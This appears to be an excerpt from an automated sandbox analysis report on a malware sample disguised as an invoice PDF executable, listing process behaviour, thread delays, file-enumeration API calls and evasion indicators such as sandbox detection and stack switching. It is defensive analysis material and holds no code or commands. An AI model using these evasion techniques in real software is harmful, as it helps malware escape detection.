Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-96810
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	API/Special instruction interceptor: Address: 19CB7C4
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	API/Special instruction interceptor: Address: 1A9FD5C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599339	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598840	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598637	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597747	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596851	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596163	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595931	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595724	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593682	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599087	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598658	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598295	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596160	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595822	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593610	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7713	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2111	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3052	Jump to behavior

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	API coverage: 3.5 %
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	API coverage: 3.8 %

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0044C2A2 FindFirstFileExW,	0_2_0044C2A2
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004868EE FindFirstFileW,FindClose,	0_2_004868EE
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0048698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0048698F
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0047D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0047D076
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0047D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0047D3A9
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00489642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00489642
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0048979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0048979D
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00489B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00489B2B
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0047DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0047DBBE
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00485C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00485C97
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B2C2A2 FindFirstFileExW,	7_2_00B2C2A2
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B668EE FindFirstFileW,FindClose,	7_2_00B668EE
